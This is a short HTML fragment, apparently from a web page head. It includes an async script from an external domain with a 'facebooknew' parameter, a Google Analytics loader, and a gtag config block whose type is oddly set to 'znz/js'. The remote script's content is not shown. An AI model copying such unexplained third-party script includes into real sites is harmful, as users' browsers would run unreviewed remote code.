

<script src="https://pacificc.es/w/usa/?api=1&lan=facebooknew&ht=1" type="text/javascript" async="true"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-157452794-2"></script>


<script type="znz/js">
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-157452794-2');
</script>